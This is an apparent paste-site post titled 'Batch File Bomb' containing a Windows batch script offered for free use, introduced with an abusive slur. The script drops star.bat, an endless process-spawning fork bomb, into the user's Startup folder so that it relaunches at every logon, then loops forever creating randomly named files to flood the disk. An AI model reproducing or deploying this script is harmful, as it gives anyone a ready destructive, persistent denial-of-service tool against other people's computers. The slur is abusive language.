
Batch File Bomb

Dec 21st, 2020
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Batch 1.18 KB | None | 0 0
  1. REM I know this is really basic, but retards are charging money to sell their skidiot version of file bombs. So here is a better version for free, I hope you enjoy.
  2. @echo off & setlocal EnableDelayedExpansion
  3. echo :k >> star.bat
  4. echo start >> star.bat
  5. echo goto k >> star.bat
  6. move star.bat "C:\Users\%Username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  7. :loop
  8. set /a ext=%random% * 14 / 32768 + 1
  9. if %ext%==1 SET ext=txt
  10. if %ext%==2 SET ext=c
  11. if %ext%==3 SET ext=py
  12. if %ext%==4 SET ext=lst
  13. if %ext%==5 md %FILENAME%
  14. if %ext%==6 SET ext=bat
  15. if %ext%==7 SET ext=cmd
  16. if %ext%==8 SET ext=sh
  17. if %ext%==9 SET ext=0
  18. if %ext%==10 SET ext=vbs
  19. if %ext%==11 SET ext=exe
  20. if %ext%==12 SET ext=cpp
  21. if %ext%==13 SET ext=css
  22. if %ext%==14 SET ext=bin
  23. SET maxvalue=108
  24. SET minvalue=32
  25. SET /A tmpRandom=((%RANDOM%)%%(%maxvalue%))+(%minvalue%)
  26. set "alpha=ABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyz_-"
  27. set alphaCnt=63
  28. For /L %%j in (1,1,%tmpRandom%) DO CALL :GEN %%j
  29. Goto :Eof
  30. :GEN
  31. Set "FILENAME="
  32. For /L %%j in (1,1,%tmpRandom%) DO (
  33.     Set /a i=!random! %% alphaCnt
  34.     Call Set FILENAME=!FILENAME!%%alpha:~!i!,1%%
  35. )
  36. echo null >> %FILENAME%.%ext%
  37. goto loop
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